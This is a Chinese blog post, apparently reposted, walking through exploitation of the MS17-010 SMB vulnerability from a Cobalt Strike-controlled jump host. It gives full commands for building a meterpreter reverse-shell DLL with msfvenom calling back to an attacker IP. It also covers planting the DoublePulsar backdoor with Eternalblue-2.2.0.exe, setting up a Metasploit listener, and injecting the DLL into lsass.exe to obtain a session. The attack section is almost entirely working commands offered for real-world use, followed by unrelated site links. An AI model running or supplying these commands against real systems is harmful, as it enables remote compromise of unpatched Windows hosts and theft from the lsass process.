MS17010原生打法

MS17010原生打法1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。项目地址:https://github.com/TolgaSEZER/EternalPulsemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.3.128LPORT=4443-fdll>x

大家好,又见面了,我是你们的朋友全栈君。

1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。

项目地址:https://github.com/TolgaSEZER/EternalPulse

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.128 LPORT=4443 -f dll > x64.dll

在这里插入图片描述
2、将dll文件拷贝到EternalPulse工具目录下打包成zip,上传到cobaltstrike已控机器中。
在这里插入图片描述
3、查看目标主机是否安装解压缩软件。
shell dir “C:\Program Files”
在这里插入图片描述
4、解压缩工具包。
shell “C:\Program Files\7-Zip\7z.exe” x EternalPulse.zip -oc:\EternalPulse
或WinRAR:
“C:\Program Files\WinRAR\rar.exe” x c:\test\EternalPulse.rar c:\test
在这里插入图片描述
在这里插入图片描述
如果没有解压缩工具,给主机上传单个的rar.exe或7z.exe也可。

5、进入到解压缩后的工具目录。
在这里插入图片描述6、种植后门。
Eternalblue-2.2.0.exe –InConfig Eternalblue-2.2.0.xml –TargetIp 存在17010漏洞的IP –TargetPort 445 –Target WIN72K8R2
(也可以不指定–Target)
在这里插入图片描述
7、msf开启监听。

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.3.128
set lport 4443
exploit -j

在这里插入图片描述
8、执行Doublepulsar-1.3.1.exe工具远程执行后门

Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

在这里插入图片描述
9、msf成功接收session。
在这里插入图片描述
Ps:实战中应x32.dll,x64.dll都生成一份。使用Doublepulsar.exe的时候要写清参数的位数。dll在其他目录,也应指定好目录,如果没有cd到攻击程序文件夹路径的话,不光exe程序要指定绝对路径,同文件夹下的两个.xml文件也应指定绝对路径。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/130353.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • python的三方库_py第三方库有哪些

    python的三方库_py第三方库有哪些Python常用第三方库可以在ThePythonPackageIndex(PyPI)软件库(官网主页:https://pypi.org/)查询、下载和发布Python包或库。网络爬虫requests:https://pypi.org/project/requests/简洁且简单的处理HTTP请求的第三方库 scrapy:https://scrap…

    2022年10月14日
  • map转map_java获取map的值

    map转map_java获取map的值String转map:Mapmap_new=newGson().fromJson(s,map.getClass());//需要引入jar包引用的jar<!–配置gson–><dependency><groupId>com.google.code.gson</groupId><artifactId>gson</artifactId><version>2.2.4</v.

  • 3.1存储管理操作系统

    3.1存储管理操作系统

  • Linode 遭受大规模DDoS攻击

    Linode 遭受大规模DDoS攻击美国当地时间12月29日,专用虚拟服务器提供商Linode遭到DDoS攻击,截至到本文发布时其web服务的访问仍受影响,其中API调用和管理功能依然部分不可用。Linode称正在努力尽快恢复正常访问服务。\\早在2013年就有过Linode就遭到大规模DDoS攻击。在HackNews上的讨论中,有人认为Linode在安全建设方面多有疏忽,并且和ISP缺乏配合,从而导致此次DDoS攻击影响过甚。\…

  • windows10虚拟机安装_虚拟机一键安装版

    windows10虚拟机安装_虚拟机一键安装版[XP虚拟机安装]VMware安装XP虚拟机下载VMware下载XPProfessional,我是在这个网站下的http://www.runker.net/windows-xp-sp3.html新建虚拟机,选择典型选择刚刚下载的XP镜像文件(这里用简易安装更方便,如果不用简易安装还需要进BIOS设置CD启动项啥的,安装过程也需要自己一步步操作,麻烦一些)点击下一步,要求填写秘钥,百度搜索秘钥填进去可以参考https://zhidao.baidu.com/question/45439092

  • Mac PHPStorm清除SVN配置缓存

    Mac PHPStorm清除SVN配置缓存

    2021年10月21日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号